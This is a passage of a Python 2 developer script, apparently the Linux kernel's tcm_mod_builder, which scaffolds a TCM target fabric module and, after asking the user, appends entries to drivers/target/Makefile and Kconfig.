p.close()
return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
kbuild = tcm_dir + "/drivers/target/Makefile"
f = open(kbuild, 'a')
f.write(buf)
f.close()
return
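# Illustratively, for fabric_mod_name 'TCM_NAB5000' this appends
# 'obj-$(CONFIG_TCM_NAB5000) += tcm_nab5000/' to drivers/target/Makefile.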
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
kconfig = tcm_dir + "/drivers/target/Kconfig"
f = open(kconfig, 'a')
f.write(buf)
f.close()
return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
tcm_dir = os.getcwd();
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + " to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + " to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
mandatories = ['modname', 'protoident']
for m in mandatories:
if not opts.__dict__[m]:
print "mandatory option is missing\n"
parser.print_help()
exit(-1)
if __name__ == "__main__":
main(str(opts.modname), opts.protoident)
|